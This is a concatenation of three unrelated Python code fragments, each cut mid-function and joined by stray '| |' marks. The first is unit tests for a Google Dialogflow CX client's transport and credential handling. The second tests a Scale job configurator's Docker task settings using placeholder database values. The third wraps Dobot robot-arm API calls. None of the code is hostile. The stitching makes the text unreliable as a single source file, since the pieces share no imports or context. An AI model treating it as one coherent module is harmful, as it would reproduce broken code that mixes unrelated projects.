credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.delete_transition_route_group), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_transition_route_group(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_transition_route_group_flattened_error_async():
client = TransitionRouteGroupsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_transition_route_group(
transition_route_group.DeleteTransitionRouteGroupRequest(),
name="name_value",
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.TransitionRouteGroupsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = TransitionRouteGroupsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.TransitionRouteGroupsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = TransitionRouteGroupsClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.TransitionRouteGroupsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = TransitionRouteGroupsClient(
client_options=options, transport=transport,
)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = TransitionRouteGroupsClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.TransitionRouteGroupsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = TransitionRouteGroupsClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.TransitionRouteGroupsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = TransitionRouteGroupsClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.TransitionRouteGroupsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.TransitionRouteGroupsGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize(
"transport_class",
[
transports.TransitionRouteGroupsGrpcTransport,
transports.TransitionRouteGroupsGrpcAsyncIOTransport,
],
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = TransitionRouteGroupsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(client.transport, transports.TransitionRouteGroupsGrpcTransport,)
def test_transition_route_groups_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.TransitionRouteGroupsTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_transition_route_groups_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.transports.TransitionRouteGroupsTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.TransitionRouteGroupsTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"list_transition_route_groups",
"get_transition_route_group",
"create_transition_route_group",
"update_transition_route_group",
"delete_transition_route_group",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_transition_route_groups_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.transports.TransitionRouteGroupsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.TransitionRouteGroupsTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
),
quota_project_id="octopus",
)
def test_transition_route_groups_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.transports.TransitionRouteGroupsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.TransitionRouteGroupsTransport()
adc.assert_called_once()
def test_transition_route_groups_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
TransitionRouteGroupsClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.TransitionRouteGroupsGrpcTransport,
transports.TransitionRouteGroupsGrpcAsyncIOTransport,
],
)
def test_transition_route_groups_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.TransitionRouteGroupsGrpcTransport, grpc_helpers),
(transports.TransitionRouteGroupsGrpcAsyncIOTransport, grpc_helpers_async),
],
)
def test_transition_route_groups_transport_create_channel(
transport_class, grpc_helpers
):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"dialogflow.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
),
scopes=["1", "2"],
default_host="dialogflow.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class",
[
transports.TransitionRouteGroupsGrpcTransport,
transports.TransitionRouteGroupsGrpcAsyncIOTransport,
],
)
def test_transition_route_groups_grpc_transport_client_cert_source_for_mtls(
transport_class,
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds,
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback,
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert, private_key=expected_key
)
def test_transition_route_groups_host_no_port():
client = TransitionRouteGroupsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="dialogflow.googleapis.com"
),
)
assert client.transport._host == "dialogflow.googleapis.com:443"
def test_transition_route_groups_host_with_port():
client = TransitionRouteGroupsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="dialogflow.googleapis.com:8000"
),
)
assert client.transport._host == "dialogflow.googleapis.com:8000"
def test_transition_route_groups_grpc_transport_channel():
channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.TransitionRouteGroupsGrpcTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_transition_route_groups_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if | |
job.get_resources()
# Get job info off of the queue
queue = Queue.objects.get(job_id=job.id)
queued_job_exe = QueuedJobExecution(queue)
queued_job_exe.scheduled('agent_1', node.id, resources)
job_exe_model = queued_job_exe.create_job_exe_model(framework_id, now())
# Test method
with patch('job.execution.configuration.configurators.settings') as mock_settings:
with patch('job.execution.configuration.configurators.secrets_mgr') as mock_secrets_mgr:
mock_settings.LOGGING_ADDRESS = 'test-logging-address'
mock_settings.DATABASES = {'default': {'NAME': 'TEST_NAME', 'USER': 'TEST_USER',
'PASSWORD': '<PASSWORD>', 'HOST': 'TEST_HOST',
'PORT': 'TEST_PORT'}}
mock_settings.BROKER_URL = 'mock://broker-url'
mock_settings.QUEUE_NAME = ''
mock_secrets_mgr.retrieve_job_type_secrets = MagicMock()
mock_secrets_mgr.retrieve_job_type_secrets.return_value = {}
configurator = ScheduledExecutionConfigurator({})
exe_config_with_secrets = configurator.configure_scheduled_job(job_exe_model, job_type,
queue.get_job_interface(), 'INFO')
# Ensure configuration is valid
ExecutionConfiguration(exe_config_with_secrets.get_dict())
# Check config for logging parameters
for task_type in exe_config_with_secrets.get_task_types():
if task_type == 'pull':
continue # Ignore pull tasks which are not Docker tasks
found_log_driver = False
found_syslog_format = False
found_syslog_address = False
found_tag = False
for docker_param in exe_config_with_secrets.get_docker_params(task_type):
if docker_param.flag == 'log-driver':
self.assertEqual(docker_param.value, 'syslog')
found_log_driver = True
elif docker_param.flag == 'log-opt':
array = docker_param.value.split('=')
opt_name = array[0]
opt_value = array[1]
if opt_name == 'syslog-format':
self.assertEqual(opt_value, 'rfc3164')
found_syslog_format = True
elif opt_name == 'syslog-address':
self.assertEqual(opt_value, 'test-logging-address')
found_syslog_address = True
elif opt_name == 'tag':
tag_value = '%s|%s' % (exe_config_with_secrets.get_task_id(task_type), job_type.name)
self.assertEqual(opt_value, tag_value)
found_tag = True
self.assertTrue(found_log_driver)
self.assertTrue(found_syslog_format)
self.assertTrue(found_syslog_address)
self.assertTrue(found_tag)
def test_configure_scheduled_job_regular(self):
"""Tests successfully calling configure_scheduled_job() on a regular (non-system) job"""
framework_id = '1234'
node = node_test_utils.create_node()
broker_dict = {'version': '1.0', 'broker': {'type': 'host', 'host_path': '/w_1/host/path'}}
input_workspace = storage_test_utils.create_workspace(json_config=broker_dict)
broker_dict = {'version': '1.0', 'broker': {'type': 's3', 'bucket_name': 'bucket1',
'host_path': '/w_2/host/path', 'region_name': 'us-east-1'}}
output_workspace = storage_test_utils.create_workspace(json_config=broker_dict)
workspaces = {input_workspace.name: input_workspace, output_workspace.name: output_workspace}
file_1 = storage_test_utils.create_file(workspace=input_workspace)
file_2 = storage_test_utils.create_file(workspace=input_workspace)
file_3 = storage_test_utils.create_file(workspace=input_workspace)
interface_dict = {'version': '1.4', 'command': 'foo',
'command_arguments': '${-a :input_1} ${-b :input_2} ${input_3} ${s_1} ${job_output_dir}',
'env_vars': [{'name': 'my_special_env', 'value': '${s_2}'}],
'mounts': [{'name': 'm_1', 'path': '/the/cont/path', 'mode': 'ro'},
{'name': 'm_2', 'path': '/the/missing/cont/path', 'mode': 'rw'},
{'name': 'm_3', 'path': '/the/optional/cont/path', 'mode': 'rw',
'required': False}],
'settings': [{'name': 's_1'}, {'name': 's_2', 'secret': True}, {'name': 's_3'},
{'name': 's_4', 'required': False}],
'input_data': [{'name': 'input_1', 'type': 'property'}, {'name': 'input_2', 'type': 'file'},
{'name': 'input_3', 'type': 'files'}],
'output_data': [{'name': 'output_1', 'type': 'file'}]}
data_dict = {'input_data': [{'name': 'input_1', 'value': 'my_val'}, {'name': 'input_2', 'file_id': file_1.id},
{'name': 'input_3', 'file_ids': [file_2.id, file_3.id]}],
'output_data': [{'name': 'output_1', 'workspace_id': output_workspace.id}]}
job_type_config_dict = {'version': '2.0', 'settings': {'s_1': 's_1_value'},
'mounts': {'m_1': {'type': 'host', 'host_path': '/m_1/host_path'}}}
job_type = job_test_utils.create_job_type(interface=interface_dict, configuration=job_type_config_dict)
from queue.job_exe import QueuedJobExecution
from queue.models import Queue
job = Queue.objects.queue_new_job(job_type, JobData(data_dict), trigger_test_utils.create_trigger_event())
resources = job.get_resources()
main_resources = resources.copy()
main_resources.subtract(NodeResources([Disk(job.input_file_size)]))
post_resources = resources.copy()
post_resources.remove_resource('disk')
# Get job info off of the queue
queue = Queue.objects.get(job_id=job.id)
# Add recipe and batch info to queue model
batch = batch_test_utils.create_batch()
recipe = recipe_test_utils.create_recipe()
queue.batch_id = batch.id
queue.recipe_id = recipe.id
queue.save()
queued_job_exe = QueuedJobExecution(queue)
queued_job_exe.scheduled('agent_1', node.id, resources)
job_exe_model = queued_job_exe.create_job_exe_model(framework_id, now())
# Test method
with patch('job.execution.configuration.configurators.settings') as mock_settings:
with patch('job.execution.configuration.configurators.secrets_mgr') as mock_secrets_mgr:
mock_settings.LOGGING_ADDRESS = None # Ignore logging settings, there's enough in this unit test
mock_settings.DATABASES = {'default': {'NAME': 'TEST_NAME', 'USER': 'TEST_USER',
'PASSWORD': '<PASSWORD>', 'HOST': 'TEST_HOST',
'PORT': 'TEST_PORT'}}
mock_settings.BROKER_URL = 'mock://broker-url'
mock_settings.QUEUE_NAME = ''
mock_secrets_mgr.retrieve_job_type_secrets = MagicMock()
mock_secrets_mgr.retrieve_job_type_secrets.return_value = {'s_2': 's_2_secret'}
configurator = ScheduledExecutionConfigurator(workspaces)
exe_config_with_secrets = configurator.configure_scheduled_job(job_exe_model, job_type,
queue.get_job_interface(), 'INFO')
# Expected results
input_wksp_vol_name = get_workspace_volume_name(job_exe_model, input_workspace.name)
input_wksp_vol_path = get_workspace_volume_path(input_workspace.name)
output_wksp_vol_name = get_workspace_volume_name(job_exe_model, output_workspace.name)
output_wksp_vol_path = get_workspace_volume_path(output_workspace.name)
m_1_vol_name = get_mount_volume_name(job_exe_model, 'm_1')
input_mnt_name = 'scale_input_mount'
output_mnt_name = 'scale_output_mount'
input_vol_name = get_job_exe_input_vol_name(job_exe_model)
output_vol_name = get_job_exe_output_vol_name(job_exe_model)
input_2_val = os.path.join(SCALE_JOB_EXE_INPUT_PATH, 'input_2', file_1.file_name)
input_3_val = os.path.join(SCALE_JOB_EXE_INPUT_PATH, 'input_3')
expected_input_files = queue.get_execution_configuration().get_dict()['input_files']
expected_output_workspaces = {'output_1': output_workspace.name}
expected_pull_task = {'task_id': '%s_pull' % job_exe_model.get_cluster_id(), 'type': 'pull',
'resources': {'cpus': resources.cpus, 'mem': resources.mem, 'disk': resources.disk},
'args': create_pull_command(job_type.get_tagged_docker_image()),
'env_vars': {'ALLOCATED_CPUS': unicode(resources.cpus),
'ALLOCATED_MEM': unicode(resources.mem),
'ALLOCATED_DISK': unicode(resources.disk),
'SCALE_JOB_ID': unicode(job.id),
'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id),
'SCALE_BATCH_ID': unicode(batch.id)
},
'docker_params': [{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % resources.cpus},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % resources.disk},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)}]}
expected_pre_task = {'task_id': '%s_pre' % job_exe_model.get_cluster_id(), 'type': 'pre',
'resources': {'cpus': resources.cpus, 'mem': resources.mem, 'disk': resources.disk},
'args': PRE_TASK_COMMAND_ARGS,
'env_vars': {'ALLOCATED_CPUS': unicode(resources.cpus),
'ALLOCATED_MEM': unicode(resources.mem),
'ALLOCATED_DISK': unicode(resources.disk), 'SCALE_DB_NAME': 'TEST_NAME',
'SCALE_DB_USER': 'TEST_USER', 'SCALE_DB_PASS': '<PASSWORD>',
'SCALE_DB_HOST': 'TEST_HOST', 'SCALE_DB_PORT': 'TEST_PORT',
'SCALE_JOB_ID': unicode(job.id), 'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id), 'SCALE_BATCH_ID': unicode(batch.id),
'SCALE_BROKER_URL': 'mock://broker-url'
},
'workspaces': {input_workspace.name: {'mode': 'ro', 'volume_name': input_wksp_vol_name}},
'mounts': {input_mnt_name: input_vol_name, output_mnt_name: output_vol_name},
'settings': {'SCALE_DB_NAME': 'TEST_NAME', 'SCALE_DB_USER': 'TEST_USER',
'SCALE_DB_PASS': '<PASSWORD>', 'SCALE_DB_HOST': 'TEST_HOST',
'SCALE_DB_PORT': 'TEST_PORT', 'SCALE_BROKER_URL': 'mock://broker-url'},
'volumes': {input_wksp_vol_name: {'container_path': input_wksp_vol_path, 'mode': 'ro',
'type': 'host', 'host_path': '/w_1/host/path'},
input_vol_name: {'container_path': SCALE_JOB_EXE_INPUT_PATH, 'mode': 'rw',
'type': 'volume'},
output_vol_name: {'container_path': SCALE_JOB_EXE_OUTPUT_PATH, 'mode': 'rw',
'type': 'volume'}},
'docker_params': [{'flag': 'env', 'value': 'SCALE_BROKER_URL=mock://broker-url'},
{'flag': 'env', 'value': 'SCALE_DB_USER=TEST_USER'},
{'flag': 'env', 'value': 'SCALE_DB_NAME=TEST_NAME'},
{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % resources.cpus},
{'flag': 'env', 'value': 'SCALE_DB_HOST=TEST_HOST'},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % resources.disk},
{'flag': 'env', 'value': 'SCALE_DB_PASS=<PASSWORD>'},
{'flag': 'env', 'value': 'SCALE_DB_PORT=TEST_PORT'},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)},
{'flag': 'volume', 'value': '%s:%s:rw' %
(output_vol_name, SCALE_JOB_EXE_OUTPUT_PATH)},
{'flag': 'volume',
'value': '/w_1/host/path:%s:ro' % input_wksp_vol_path},
{'flag': 'volume', 'value': '%s:%s:rw' %
(input_vol_name, SCALE_JOB_EXE_INPUT_PATH)}
]}
expected_pst_task = {'task_id': '%s_post' % job_exe_model.get_cluster_id(), 'type': 'post',
'resources': {'cpus': post_resources.cpus, 'mem': post_resources.mem,
'disk': post_resources.disk},
'args': POST_TASK_COMMAND_ARGS,
'env_vars': {'ALLOCATED_CPUS': unicode(post_resources.cpus),
'ALLOCATED_MEM': unicode(post_resources.mem),
'ALLOCATED_DISK': unicode(post_resources.disk), 'SCALE_DB_NAME': 'TEST_NAME',
'SCALE_DB_USER': 'TEST_USER', 'SCALE_DB_PASS': '<PASSWORD>',
'SCALE_DB_HOST': 'TEST_HOST', 'SCALE_DB_PORT': 'TEST_PORT',
'SCALE_JOB_ID': unicode(job.id), 'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id), 'SCALE_BATCH_ID': unicode(batch.id),
'SCALE_BROKER_URL': 'mock://broker-url'
},
'workspaces': {input_workspace.name: {'mode': 'rw', 'volume_name': input_wksp_vol_name},
output_workspace.name: {'mode': 'rw', 'volume_name': output_wksp_vol_name}},
'mounts': {output_mnt_name: output_vol_name},
'settings': {'SCALE_DB_NAME': 'TEST_NAME', 'SCALE_DB_USER': 'TEST_USER',
'SCALE_DB_PASS': '<PASSWORD>', 'SCALE_DB_HOST': 'TEST_HOST',
'SCALE_DB_PORT': 'TEST_PORT', 'SCALE_BROKER_URL': 'mock://broker-url'},
'volumes': {input_wksp_vol_name: {'container_path': input_wksp_vol_path, 'mode': 'rw',
'type': 'host', 'host_path': '/w_1/host/path'},
output_wksp_vol_name: {'container_path': output_wksp_vol_path, 'mode': 'rw',
'type': 'host', 'host_path': '/w_2/host/path'},
output_vol_name: {'container_path': SCALE_JOB_EXE_OUTPUT_PATH, 'mode': 'ro',
'type': 'volume'}},
'docker_params': [{'flag': 'env', 'value': 'SCALE_BROKER_URL=mock://broker-url'},
{'flag': 'env', 'value': 'SCALE_DB_USER=TEST_USER'},
{'flag': 'env', 'value': 'SCALE_DB_NAME=TEST_NAME'},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%d' % job.id},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%d' % job.num_exes},
{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % post_resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % post_resources.cpus},
{'flag': 'env', 'value': 'SCALE_DB_HOST=TEST_HOST'},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % post_resources.disk},
{'flag': 'env', 'value': 'SCALE_DB_PASS=<PASSWORD>'},
{'flag': 'env', 'value': 'SCALE_DB_PORT=TEST_PORT'},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)},
{'flag': 'volume', 'value': '%s:%s:ro' %
(output_vol_name, SCALE_JOB_EXE_OUTPUT_PATH)},
{'flag': 'volume',
'value': '/w_1/host/path:%s:rw' % input_wksp_vol_path},
{'flag': 'volume',
'value': '/w_2/host/path:%s:rw' % output_wksp_vol_path}
]}
expected_main_task = {'task_id': '%s_main' % job_exe_model.get_cluster_id(), 'type': 'main',
'resources': {'cpus': main_resources.cpus, 'mem': main_resources.mem,
'disk': main_resources.disk},
'args': '-a my_val -b %s %s s_1_value %s' %
(input_2_val, input_3_val, SCALE_JOB_EXE_OUTPUT_PATH),
'env_vars': {'INPUT_1': 'my_val', 'INPUT_2': input_2_val, 'INPUT_3': input_3_val,
'job_output_dir': SCALE_JOB_EXE_OUTPUT_PATH,
'OUTPUT_DIR': SCALE_JOB_EXE_OUTPUT_PATH, 'S_1': 's_1_value',
'S_2': 's_2_secret', 'my_special_env': 's_2_secret',
'ALLOCATED_CPUS': unicode(main_resources.cpus),
'ALLOCATED_MEM': unicode(main_resources.mem),
'ALLOCATED_DISK': unicode(main_resources.disk),
'SCALE_JOB_ID': unicode(job.id), 'SCALE_EXE_NUM': unicode(job.num_exes),
'SCALE_RECIPE_ID': unicode(recipe.id), 'SCALE_BATCH_ID': unicode(batch.id)
},
'workspaces': {input_workspace.name: {'mode': 'ro', 'volume_name': input_wksp_vol_name}},
'mounts': {'m_1': m_1_vol_name, 'm_2': None, 'm_3': None, input_mnt_name: input_vol_name,
output_mnt_name: output_vol_name}, # m_2 and s_3 are required, but missing
'settings': {'s_1': 's_1_value', 's_2': 's_2_secret', 's_3': None},
'volumes': {input_wksp_vol_name: {'container_path': input_wksp_vol_path, 'mode': 'ro',
'type': 'host', 'host_path': '/w_1/host/path'},
input_vol_name: {'container_path': SCALE_JOB_EXE_INPUT_PATH, 'mode': 'ro',
'type': 'volume'},
output_vol_name: {'container_path': SCALE_JOB_EXE_OUTPUT_PATH, 'mode': 'rw',
'type': 'volume'},
m_1_vol_name: {'container_path': '/the/cont/path', 'mode': 'ro',
'type': 'host', 'host_path': '/m_1/host_path'}},
'docker_params': [{'flag': 'env', 'value': 'S_1=s_1_value'},
{'flag': 'env', 'value': 'S_2=s_2_secret'},
{'flag': 'env', 'value': 'ALLOCATED_MEM=%.1f' % main_resources.mem},
{'flag': 'env', 'value': 'ALLOCATED_CPUS=%.1f' % main_resources.cpus},
{'flag': 'env', 'value': 'my_special_env=s_2_secret'},
{'flag': 'env', 'value': 'ALLOCATED_DISK=%.1f' % main_resources.disk},
{'flag': 'env', 'value': 'INPUT_2=%s' % input_2_val},
{'flag': 'env', 'value': 'INPUT_3=%s' % input_3_val},
{'flag': 'env', 'value': 'INPUT_1=my_val'},
{'flag': 'env', 'value': 'job_output_dir=%s' % SCALE_JOB_EXE_OUTPUT_PATH},
{'flag': 'env', 'value': 'OUTPUT_DIR=%s' % SCALE_JOB_EXE_OUTPUT_PATH},
{'flag': 'env', 'value': 'SCALE_JOB_ID=%s' % unicode(job.id)},
{'flag': 'env', 'value': 'SCALE_EXE_NUM=%s' % unicode(job.num_exes)},
{'flag': 'env', 'value': 'SCALE_RECIPE_ID=%s' % unicode(recipe.id)},
{'flag': 'env', 'value': 'SCALE_BATCH_ID=%s' % unicode(batch.id)},
{'flag': 'volume', 'value': '%s:%s:rw' %
(output_vol_name, SCALE_JOB_EXE_OUTPUT_PATH)},
{'flag': 'volume',
'value': '/m_1/host_path:/the/cont/path:ro'},
{'flag': 'volume',
'value': '/w_1/host/path:%s:ro' % input_wksp_vol_path},
{'flag': 'volume', 'value': '%s:%s:ro' %
(input_vol_name, SCALE_JOB_EXE_INPUT_PATH)}
]}
expected_config = {'version': '2.0',
'input_files': expected_input_files,
'output_workspaces': expected_output_workspaces,
'tasks': [expected_pull_task, expected_pre_task, expected_main_task, expected_pst_task]}
# Ensure configuration is valid
ExecutionConfiguration(exe_config_with_secrets.get_dict())
# Compare results including secrets, but convert Docker param lists to sets so order is ignored
config_with_secrets_dict = exe_config_with_secrets.get_dict()
for task_dict in config_with_secrets_dict['tasks']:
docker_params_set = set()
for docker_param in task_dict['docker_params']:
docker_params_set.add('%s=%s' % (docker_param['flag'], docker_param['value']))
task_dict['docker_params'] = docker_params_set
for task_dict in expected_config['tasks']:
docker_params_set = set()
for docker_param in task_dict['docker_params']:
docker_params_set.add('%s=%s' % (docker_param['flag'], docker_param['value']))
task_dict['docker_params'] = docker_params_set
self.maxDiff | |
SetEMotorS(api, index, isEnabled, speed, distance, isQueued=0):
emotorS = EMotorS()
emotorS.index = index
emotorS.isEnabled = isEnabled
emotorS.speed = speed
emotorS.distance = distance
queuedCmdIndex = c_uint64(0)
if slaveDevType == DevType.Magician:
tempSlaveId = slaveId
elif masterDevType == DevType.Conntroller and (slaveDevType == DevType.MagicianLite or slaveDevType == DevType.Idle):
tempSlaveId = -1
else:
tempSlaveId = slaveId
while(True):
result = api.SetEMotorS(c_int(masterId), c_int(tempSlaveId), byref(emotorS), isQueued, byref(queuedCmdIndex))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [queuedCmdIndex.value]
def GetIOADC(api, addr):
param = IOADC()
param.address = addr
if slaveDevType == DevType.Magician:
tempSlaveId = slaveId
elif masterDevType == DevType.Conntroller and (slaveDevType == DevType.MagicianLite or slaveDevType == DevType.Idle):
tempSlaveId = -1
else:
tempSlaveId = slaveId
while(True):
result = api.GetIOADC(c_int(masterId), c_int(tempSlaveId), byref(param))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [param.value]
def SetAngleSensorStaticError(api, rearArmAngleError, frontArmAngleError):
c_rearArmAngleError = c_float(rearArmAngleError)
c_frontArmAngleError = c_float(frontArmAngleError)
while(True):
result = api.SetAngleSensorStaticError(c_int(masterId), c_int(slaveId), c_rearArmAngleError, c_frontArmAngleError)
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
def GetAngleSensorStaticError(api):
rearArmAngleError = c_float(0)
frontArmAngleError = c_float(0)
while(True):
result = api.GetAngleSensorStaticError(c_int(masterId), c_int(slaveId), byref(rearArmAngleError), byref(frontArmAngleError))
if result != DobotCommunicate.DobotCommunicate_NoError:
dSleep(5)
continue
break
return [rearArmAngleError.value, frontArmAngleError.value]
def SetAngleSensorCoef(api, rearArmAngleCoef, frontArmAngleCoef):
c_rearArmAngleCoef = c_float(rearArmAngleCoef)
c_frontArmAngleCoef = c_float(frontArmAngleCoef)
while(True):
result = api.SetAngleSensorCoef(c_int(masterId), c_int(slaveId), c_rearArmAngleCoef, c_frontArmAngleCoef)
